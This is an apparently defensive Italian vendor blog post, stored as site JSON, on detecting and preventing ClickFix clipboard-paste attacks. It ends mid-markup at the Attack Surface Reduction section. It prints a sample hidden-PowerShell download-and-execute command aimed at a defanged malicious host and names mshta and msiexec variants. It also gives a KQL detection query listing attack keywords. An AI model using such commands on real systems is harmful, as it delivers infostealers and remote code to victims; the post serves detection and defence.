[{"data":1,"prerenderedAt":1120},["ShallowReactive",2],{"sc:header-data-it":3,"sc:footer-data-it":489,"author-it-fritz-zurhorst-11e6a2cbe4b79b":518,"content-it-fritz-zurhorst":542,"content-events-it-fritz-zurhorst":1104,"authors_data:Fritz Zurhorst|Nadine Klein":1105},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"it":13},{"title":14,"url":15,"alt":16},"Home","/it","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"it":21},{"title":22,"description":23},"Workplace","Basato su Microsoft 365 per postazioni di lavoro intelligenti, sicure e flessibili, con integrazione di tecnologie moderne e servizi di identità.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"it":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"it":34},{"title":35,"url":36},"Managed Intune","/it/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"it":40},{"title":41,"url":42},"Managed Entra","/it/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"it":46},{"title":47,"url":48},"Managed Workplace","/it/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"it":52},{"title":53,"url":54},"Consulting Services","/it/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"it":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"it":64},{"title":65,"url":66},"Microsoft Entra Suite","/it/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"it":70},{"title":71,"url":72},"Microsoft Intune","/it/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"it":76},{"title":77,"url":78},"Microsoft Windows","/it/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"it":82},{"title":83,"url":84},"Windows 365 Cloud PC","/it/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"it":88},{"title":89,"url":90},"Cloud Workplace Foundation","/it/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"it":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"it":100},{"title":101,"url":102},"Microsoft 365 Copilot","/it/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"it":106},{"title":107,"url":108},"Teams","/it/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"it":112},{"title":113,"url":114},"SharePoint & Power Platform","/it/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"it":118},{"title":119,"url":120},"Exchange Online","/it/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"it":124},{"title":125,"url":126},"Information Protection & Compliance","/it/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"it":130},{"title":131,"description":132},"Azure","Crescita con Azure: riduci i costi cloud, aumenta l'efficienza e spingi l'innovazione con IaaS e PaaS.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"it":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"it":142},{"title":143,"url":144},"Azure Managed Services","/it/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"it":148},{"title":149,"url":150},"Azure Consulting","/it/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"it":154},{"title":155},"Scenari",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"it":160},{"title":161,"url":162},"Pianifica il tuo cloud","/it/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"it":166},{"title":167,"url":168},"Migra al cloud","/it/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"it":172},{"title":173,"url":174},"Innova la tua azienda","/it/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"it":178},{"title":179,"url":180},"Ripensa la tua strategia VMware","/it/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"it":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"it":190},{"title":191,"url":192},"Azure Foundation","/it/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"it":196},{"title":197,"url":198},"Azure AI Foundation","/it/azure/azure-ai-foundation",{"name":86,"languages":200},{"it":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"it":205},{"title":206,"url":207},"Azure Data Foundation","/it/azure/azure-data-foundation",{"name":188,"languages":209},{"it":210},{"title":211,"url":212},"Azure Container Foundation","/it/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"it":216},{"title":217,"url":218},"Managed Dark Tenant","/it/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"it":222},{"title":223,"url":224},"Cloud Adoption Framework","/it/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"it":228},{"title":229,"url":230},"Cloud Competence Center","/it/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"it":234},{"title":235,"description":236,"emergency":237},"Security","Vigilanza nel cloud con un managed service 24/7 pluripremiato, incident response e protezione moderna per la tua infrastruttura.",{"text":238,"href":239,"skin":240,"icon":241},"Sotto attacco?","/it/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"it":249},{"title":250,"url":251},"Managed Red Tenant","/it/security/managed-red-tenant",{"name":214,"languages":253},{"it":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"it":259},{"title":260,"url":261},"Sentinel Data Lake","/it/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"it":265},{"title":266,"url":267},"Security Consulting","/it/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"it":274},{"title":275,"url":276},"Cloud Security Operations Center","/it/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"it":280},{"title":281,"url":282},"Global Secure Access","/it/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"it":286},{"title":287,"url":288},"MyWorkID","/it/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"it":295},{"title":296,"url":297},"Preventive Services","/it/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"it":301},{"title":302,"url":303},"Data Security Service","/it/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"it":307},{"title":308,"url":309},"Security Copilot Agents","/it/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"it":313},{"title":314,"url":315},"Implementazione di NIS2","/it/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"it":319},{"title":320,"description":321},"Prodotti","Prodotti complementari per un ambiente Microsoft sicuro e 100 % cloud-native, che rafforzano la collaborazione, l'autenticazione di rete e la gestione software.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"it":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Distribuzione software dal cloud",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"it":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Distribuzione dei certificati dal cloud",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"it":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Lavora con i tuoi dati locali di Office 365",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"it":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Migra i dati da un server all'altro",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"it":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider for Microsoft 365",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"it":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Autenticazione per la tua rete",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"it":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Trova contatti in Microsoft Teams",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"it":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Monitoraggio di Windows Autopilot in tempo reale",{"name":396,"languages":397},"casestudies",{"it":398},{"title":399,"url":400,"description":401},"Case Studies","/it/casestudies","Pioniere nel cloud: il tuo Microsoft partner di riferimento per soluzioni cloud con un approccio blueprint-based e competenza in Infrastructure-as-Code.",{"name":403,"languages":404,"children":407},"company",{"it":405},{"title":406,"description":401},"Azienda",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"it":411},{"title":412},"Chi siamo",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"it":417},{"title":418,"url":419},"Fatti e numeri","/it/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"it":423},{"title":424,"url":425},"Contatti e sedi","/it/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"it":429},{"title":430,"url":431}," glueckkanja Switzerland","/it/company/switzerland",{"name":433,"languages":434},"austria",{"it":435},{"title":436,"url":437},"glueckkanja Austria","/it/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"it":441},{"title":442},"Carriera",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"it":447},{"title":448,"url":449},"Panoramica carriera","/it/career",{"name":451,"languages":452},"company-young-professionals",{"it":453},{"title":454,"url":455},"Young Professionals","/it/young-professionals",{"name":457,"languages":458},"company-jobs",{"it":459},{"title":460,"url":461},"Offerte di lavoro","/it/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"it":465},{"title":466},"Novità",[468,474],{"name":469,"languages":470},"company-blog",{"it":471},{"title":472,"url":473},"Blog","/it/blog",{"name":469,"languages":475},{"it":476},{"title":477,"url":478},"Eventi","/it/events",[480],{"name":481,"languages":482},"career-meta",{"it":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"it":487},{"title":488,"url":425,"active":484},"Contatti",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksIt":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Privacy","/it/privacy",{"title":514,"url":515},"Imprint","/it/imprint",{"title":507,"url":517},"/it/cookies",{"id":519,"title":520,"body":521,"description":527,"extension":532,"meta":533,"name":520,"navigation":325,"otherLanguages":534,"path":538,"seo":539,"stem":540,"__hash__":541},"authors/fritz-zurhorst.md","Fritz Zurhorst",{"type":522,"value":523,"toc":528},"minimal",[524],[525,526,527],"p",{},"Friedemann Zurhorst ist Cyber Security Architect bei glueckkanja. Sein Schwerpunkt liegt auf Identity Security: Er prüft gewachsene Active-Directory-Umgebungen in AD Security Reviews, begleitet Kunden bei der Einführung starker Authentifizierung und klassifiziert Privilegien nach dem Enterprise Access Model, unter anderem in EntraOps-Workshops. Dazu kommen Platform Engineering und die Arbeit am Managed Red Tenant, mit dem glueckkanja Kunden eine sichere administrative Umgebung bereitstellt.",{"title":529,"searchDepth":530,"depth":530,"links":531},"",2,[],"md",{},{"en":535,"es":536,"ja":537},"Friedemann Zurhorst is a Cyber Security Architect at glueckkanja. His focus is identity security. He assesses grown Active Directory environments in AD security reviews, guides customers through the rollout of strong authentication, and classifies privileges along the Enterprise Access Model, among other things in EntraOps workshops. On top of that comes platform engineering as well as work on the Managed Red Tenant, with which glueckkanja provides customers with a secure administrative environment.","Friedemann Zurhorst es Cyber Security Architect en glueckkanja. Su especialidad es la seguridad de identidades. Evalúa entornos de Active Directory que han crecido con los años en AD Security Reviews, acompaña a los clientes en la implantación de una autenticación fuerte y clasifica los privilegios según el Enterprise Access Model, entre otros en los workshops de EntraOps. A ello se suman el platform engineering y el trabajo en el Managed Red Tenant, con el que glueckkanja proporciona a sus clientes un entorno administrativo seguro.","Friedemann Zurhorstは、glueckkanjaのCyber Security Architectです。専門はIdentity Securityで、AD Security Reviewでは長年かけて積み上がったActive Directory環境を点検し、強力な認証の導入をお客様とともに進め、EntraOpsワークショップなどでEnterprise Access Modelに沿って特権を分類しています。あわせてPlatform Engineeringと、glueckkanjaがお客様に安全な管理環境を提供するManaged Red Tenantの開発にも携わっています。","/fritz-zurhorst",{"title":520,"description":527},"fritz-zurhorst","GMLpRIZsG9AhXoKwTKoJSiKYi53_8VC070ybXAUDQK4",[543],{"id":544,"title":545,"author":546,"body":548,"cta":494,"description":529,"eventid":494,"extension":532,"hideInRecent":484,"layout":1057,"meta":1058,"moment":1062,"navigation":325,"path":1096,"seo":1097,"stem":1098,"tags":1099,"webcast":484,"__hash__":1103},"content_it/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Quando l'utente è l'exploit, e come lo fermi",[520,547],"Nadine Klein",{"type":522,"value":549,"toc":1046},[550,555,558,561,568,576,579,585,588,607,618,624,630,633,637,639,642,645,649,651,654,668,672,674,681,760,777,780,784,786,789,804,807,810,814,816,819,822,847,851,853,856,863,867,869,872,898,901,904,907,1006,1009,1012,1015,1026,1029,1033,1035,1042],[551,552,554],"h2",{"id":553},"la-catena-di-attacco-clickfix","La catena di attacco ClickFix",[525,556,557],{},"{: .h3-font-size}",[525,559,560],{},"ClickFix è un attacco in cui gli utenti diventano il proprio attaccante. Nessun exploit, nessuna vulnerabilità. È la vittima stessa a eseguire il codice malevolo, con un singolo copia-incolla.",[525,562,563],{},[564,565],"img",{"alt":566,"src":567},"Catena di attacco ClickFix in cinque stadi: l'esca, il trucco, il copia-incolla, l'esecuzione, l'infezione.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[525,569,570,571,575],{},"L'esca è social engineering: un CAPTCHA falso su una pagina malevola, un finto messaggio di supporto (\"il tuo browser ha bisogno di un aggiornamento\"), una mail di phishing o una pagina di meeting contraffatta. Mentre la vittima è sulla pagina, JavaScript scrive il payload negli appunti tramite ",[572,573,574],"code",{},"clipboard.writeText()",". Poi la pagina chiede all'utente di premere Win+R, Ctrl+V e Invio. La finestra di dialogo Esegui avvia ciò che si trova negli appunti.",[525,577,578],{},"Un'esca tipica si presenta così:",[525,580,581],{},[564,582],{"alt":583,"src":584},"Screenshot di un'esca CAPTCHA falsa che invita l'utente a premere Win e X, poi a incollare e a eseguire un comando con Invio.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[525,586,587],{},"Il comando che mette negli appunti si presenta così:",[589,590,592],"div",{"style":591},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[593,594,598],"pre",{"className":595,"code":596,"language":597,"meta":529,"style":529},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[572,599,600],{"__ignoreMap":529},[601,602,605],"span",{"class":603,"line":604},"line",1,[601,606,596],{},[525,608,609,610,613,614,617],{},"Due cose accadono contemporaneamente. PowerShell parte in una finestra nascosta (",[572,611,612],{},"-w h","), e ",[572,615,616],{},"iex(irm …)"," scarica il payload e lo esegue direttamente in memoria. Niente finisce su disco, quindi un antivirus basato su firme non ha nulla da scansionare. Il secondo stadio è di solito un infostealer (Lumma, Vidar, RedLine, StealC), un remote access trojan o un loader di ransomware.",[525,619,620,621,623],{},"Lo stesso schema nella telemetria di Microsoft Defender, un PowerShell nascosto avviato da Windows Terminal che esegue ",[572,622,616],{},":",[525,625,626],{},[564,627],{"alt":628,"src":629},"Inspect record di Microsoft Defender con la catena di processi WindowsTerminal.exe verso pwsh.exe verso powershell.exe che esegue un comando iex(irm …).","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[525,631,632],{},"Perché funziona così bene: tutto gira nel contesto dell'utente, senza privilegi elevati. Cookie, password salvate e token di sessione sono a portata di un utente standard. L'attaccante non deve escalare privilegi per arrivare a ciò per cui è venuto.",[551,634,636],{"id":635},"cosa-rileva-microsoft-defender","Cosa rileva Microsoft Defender",[525,638,557],{},[525,640,641],{},"Negli ultimi mesi Microsoft ha investito molto nel rilevamento di ClickFix. Se il tuo Defender è in salute e configurato correttamente, ottieni detection native per i payload ClickFix. Dal secondo trimestre 2025 MDE pubblica alert comportamentali con titoli come \"Suspicious 'ClickFix' behavior detected\", \"Malicious PowerShell command executed via Run dialog\" o \"An active 'Pacalau' malware in a command line was prevented from executing\". Partono dal cloud engine di MDE tramite l'analisi della catena di processi, in parallelo al rilevamento AV e spesso qualche secondo prima.",[525,643,644],{},"La configurazione che rende possibile tutto questo è più avanti, nella parte sull'hardening dell'esecuzione.",[551,646,648],{"id":647},"dove-il-rilevamento-nativo-arriva-ai-suoi-limiti","Dove il rilevamento nativo arriva ai suoi limiti",[525,650,557],{},[525,652,653],{},"Le firme ML basate su cloud hanno bisogno di tempo prima di scattare. Vediamo regolarmente una lacuna di oltre un minuto tra l'avvio di PowerShell e l'alert di Defender. Un payload più rapido scivola attraverso questa finestra.",[525,655,656,657,659,660,663,664,667],{},"Inoltre gli attaccanti si adattano in fretta. Sostituisci ",[572,658,597],{}," con ",[572,661,662],{},"mshta http://..."," o ",[572,665,666],{},"msiexec /i http://...",", entrambi LOLBin classici, e i rilevamenti specifici per PowerShell non fanno più presa.",[551,669,671],{"id":670},"chiudere-la-lacuna-un-hunt-su-runmru","Chiudere la lacuna: un hunt su RunMRU",[525,673,557],{},[525,675,676,677,680],{},"Questa lacuna la chiudiamo con le custom detection. Il punto di partenza è una query KQL sulla chiave di registro ",[572,678,679],{},"RunMRU",", che registra ogni comando che un utente digita nella finestra di dialogo Win+R.",[589,682,683],{"style":591},[593,684,688],{"className":685,"code":686,"language":687,"meta":529,"style":529},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[572,689,690,695,700,706,712,718,724,730,736,742,748,754],{"__ignoreMap":529},[601,691,692],{"class":603,"line":604},[601,693,694],{},"DeviceRegistryEvents\n",[601,696,697],{"class":603,"line":530},[601,698,699],{},"| where ActionType =~ \"RegistryValueSet\"\n",[601,701,703],{"class":603,"line":702},3,[601,704,705],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[601,707,709],{"class":603,"line":708},4,[601,710,711],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[601,713,715],{"class":603,"line":714},5,[601,716,717],{},"| where RegistryValueData has \" ✅ \"\n",[601,719,721],{"class":603,"line":720},6,[601,722,723],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[601,725,727],{"class":603,"line":726},7,[601,728,729],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[601,731,733],{"class":603,"line":732},8,[601,734,735],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[601,737,739],{"class":603,"line":738},9,[601,740,741],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[601,743,745],{"class":603,"line":744},10,[601,746,747],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[601,749,751],{"class":603,"line":750},11,[601,752,753],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[601,755,757],{"class":603,"line":756},12,[601,758,759],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[525,761,762,763,766,767,766,770,766,773,776],{},"La query segnala ogni voce di Win+R che sembra un comando ClickFix: PowerShell, mshta, curl o msiexec insieme a indicatori tipici come ",[572,764,765],{},"-w hidden",", ",[572,768,769],{},"iex",[572,771,772],{},"irm",[572,774,775],{},"DownloadString"," o payload codificati in Base64. Intercetta anche i trucchi più sottili. L'emoji del segno di spunta verde che molte esche CAPTCHA false mettono davanti al comando. I caratteri Unicode di blocchi cirillici, arabi o thailandesi con cui gli attaccanti mimetizzano il testo e aggirano i filtri di stringa più semplici. Se uno di questi pattern compare in una voce di Win+R, è molto probabile che sia in corso un attacco ClickFix.",[525,778,779],{},"Per i nostri clienti CSOC gestiamo queste e altre custom detection, per chiudere la lacuna tra le nuove tecniche di attacco e il rilevamento integrato.",[551,781,783],{"id":782},"layer-di-protezione-1-bloccare-la-consegna","Layer di protezione 1: bloccare la consegna",[525,785,557],{},[525,787,788],{},"Passiamo alla prevenzione. ClickFix è diffuso e ha successo, quindi una singola protezione non basta. Lavoriamo a layer, dalla consegna all'esecuzione.",[525,790,791,792,795,796,799,800,803],{},"Network Protection blocca domini di delivery e server C2 noti per tutti i browser. MDE Web Content Filtering aggiunge categorie come \"Newly registered domains\", \"Hacking\" e \"Illegal Software\". Network Protection è integrata in Windows, ma per i browser di terze parti devi disattivare QUIC ed ECH, perché entrambi cifrano l'intera connessione e nascondono il dominio di destinazione. Disattiva QUIC in Chrome e Firefox tramite enterprise policy (",[572,793,794],{},"QuicAllowed = Disabled"," in Chrome, ",[572,797,798],{},"network.http.http3.enable = false"," in Firefox); per ECH imposti in Chrome ",[572,801,802],{},"EncryptedClientHelloEnabled = Disabled",".",[525,805,806],{},"Per Edge attivi SmartScreen. Per i browser di terze parti abiliti il loro Safe Browsing integrato. Non è la stessa cosa di Network Protection, ma aiuta a filtrare le pagine dannose. Per il vettore mail, Safe Links e Safe Attachments verificano link e allegati prima che gli utenti interagiscano con essi.",[525,808,809],{},"Il punto debole: tutto questo fa presa solo contro infrastrutture note. Le campagne ClickFix attuali passano da infrastrutture appena registrate, identificate e bloccate troppo tardi, e a volte da siti legittimi che un attaccante ha compromesso. Quindi vediamo cosa protegge dopo che l'esca è stata consegnata.",[551,811,813],{"id":812},"layer-di-protezione-2-bloccare-il-trucco","Layer di protezione 2: bloccare il trucco",[525,815,557],{},[525,817,818],{},"Alcune funzionalità di Edge alzano l'ostacolo mentre l'utente si trova su una pagina malevola. Governare le estensioni del browser impedisce che gli utenti installino estensioni malevole o compromesse, capaci di iniettare overlay ClickFix o di manipolare direttamente gli appunti. L'Edge Enhanced Security Mode applica misure di protezione più severe alle pagine sconosciute e visitate di rado (JIT disattivato, Control Flow Guard, protezione dello stack in hardware), il che rende nettamente più difficili i takeover del browser basati su exploit. Typo Protection avvisa dei domini typosquatted (micros0ft.com, paypa1.com) e blocca un vettore di delivery ClickFix diffuso, quello dei domini di marca contraffatti.",[525,820,821],{},"I controlli tecnici sono solo metà dell'opera. La formazione degli utenti resta decisiva. L'unica regola che regge la maggior parte del peso: se una pagina web ti chiede di incollare qualcosa nel tuo computer, è un attacco. Rendilo concreto nell'awareness training:",[823,824,826,827,826,835,826,841],"ul",{"style":825},"margin: 0.25rem 0","\n  ",[828,829,830,834],"li",{},[831,832,833],"strong",{},"Mostrare esche reali:"," checkbox \"Verify you are human\" contraffatte, \"il tuo browser ha bisogno di un aggiornamento\", \"non è stato possibile visualizzare il documento, esegui questo fix\", prompt di audio Teams o Zoom non funzionanti.",[828,836,837,840],{},[831,838,839],{},"Dimostrare il trucco degli appunti:"," mostrare come la pagina sovrascrive in silenzio gli appunti.",[828,842,843,846],{},[831,844,845],{},"Rendere semplice la segnalazione:"," rapida e senza attribuzione di colpe.",[551,848,850],{"id":849},"layer-di-protezione-3-bloccare-lazione","Layer di protezione 3: bloccare l'azione",[525,852,557],{},[525,854,855],{},"Qui ci sono alcune possibilità per irrobustire il sistema, nessuna delle quali è una garanzia. Inizia disattivando la finestra di dialogo Esegui, così rimuovi il punto di ingresso Win+R. La guidance di Microsoft su ClickFix consiglia di disattivarla \"where it isn't necessary\". Questo chiude lo specifico attacco di paste con Win+R, ma restano superfici di avvio alternative, per esempio la barra degli indirizzi di Explorer e Windows Terminal.",[525,857,858,859,862],{},"Puoi inoltre irrobustire Edge con ",[572,860,861],{},"DefaultClipboardSetting",", che impedisce a JavaScript di scrivere in silenzio negli appunti.",[551,864,866],{"id":865},"layer-di-protezione-4-bloccare-lesecuzione","Layer di protezione 4: bloccare l'esecuzione",[525,868,557],{},[525,870,871],{},"Prima delle funzionalità avanzate, metti in ordine le basi. Per ClickFix significa:",[823,873,826,874,826,880,826,886,826,892],{"style":825},[828,875,876,879],{},[831,877,878],{},"Local Admin Reduction:"," rimuovere dove possibile i diritti di amministratore locale agli utenti finali, per limitare l'effetto di un'esecuzione di codice.",[828,881,882,885],{},[831,883,884],{},"Endpoint Privilege Management (EPM):"," far lavorare gli utenti come utenti standard ed elevare solo le app approvate tramite regole di policy.",[828,887,888,891],{},[831,889,890],{},"Hardening di UAC:"," verificare l'enforcement del secure desktop, il comportamento dei prompt per amministratori e utenti standard e il rilevamento degli installer.",[828,893,894,897],{},[831,895,896],{},"Credential Guard:"," isolare hash NTLM, ticket Kerberos e altro materiale credenziale tramite la sicurezza basata su virtualizzazione, perché il furto di credenziali resti difficile anche se un attaccante ottiene diritti di amministratore.",[525,899,900],{},"Questi controlli riducono le possibilità di escalation, proteggono le credenziali e impongono il least privilege. Il loro limite: circoscrivono ciò che accade dopo una compromissione. Non impediscono a un infostealer nel contesto di un utente standard di leggere cookie, token di sessione e credential store delle app leggibili dall'utente.",[525,902,903],{},"Poi Microsoft Defender. Defender AV può rilevare il payload del secondo stadio, ma solo con le impostazioni giuste: attivare Cloud Protection e portare il livello di protezione su High o High+. AMSI, l'Antimalware Scan Interface, consente alle applicazioni di passare contenuti a Defender per la verifica a runtime, dopo che sono stati decifrati o deoffuscati in memoria ma prima che vengano eseguiti. PowerShell usa AMSI per identificare il codice malevolo, e AMSI richiede protezione in tempo reale e behavior monitoring.",[525,905,906],{},"Almeno cinque regole di Attack Surface Reduction sono rilevanti contro ClickFix:",[589,908,910],{"style":909},"margin: 0.5rem 0 2rem; 